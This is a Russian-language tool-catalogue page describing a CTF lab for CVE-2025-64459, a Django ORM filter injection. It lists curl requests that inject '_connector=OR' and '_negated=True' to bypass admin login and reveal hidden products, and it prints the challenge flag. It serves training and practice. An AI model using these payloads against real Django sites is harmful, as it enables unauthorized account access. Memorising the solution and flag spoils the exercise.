Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-64459 — CTF-задача, демонстрирующая внедрение фильтра Django ORM (CVE-2025-64459) с обходом аутентификации и обходом фильтра продуктов, включая развертывание и получение флага. | Kitploit
Инструменты/GitHubGitHub/z3yr0xx/cve-2025-64459
Анализ уязвимостейЭксплуатация веб-приложенийВеб-безопасностьCTFОбучение и ОбразованиеЛаборатории и Практика
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

CTF-задача, демонстрирующая внедрение фильтра Django ORM (CVE-2025-64459) с обходом аутентификации и обходом фильтра продуктов, включая развертывание и получение флага.

Репозиторий
29 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CTF-задача: Django ORM Injection (CVE-2025-64459)

Категория: Веб-безопасность
Сложность: Средняя
Уязвимость: CVE-2025-64459 - Django ORM Filter Injection

📝 Описание

Мы создали защищенный магазин мерча с панелью администратора. Сможете ли вы обойти аутентификацию и найти приватную заметку администратора?

URL: http://YOUR_SERVER:6008

🚀 Развертывание

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 Эксплойты (CVE-2025-64459)

Обход аутентификации (/login/)

root@kitploit:~
# Использование _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Использование _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Обход фильтра товаров (/)

root@kitploit:~
# Отрицание фильтра is_public
curl "http://HOST:8054/?_negated=True"

# Прямой доступ
curl "http://HOST:8054/?is_public=False"

🏁 Флаг

lol-you-here_then-you_exploited_me

Скачать инструмент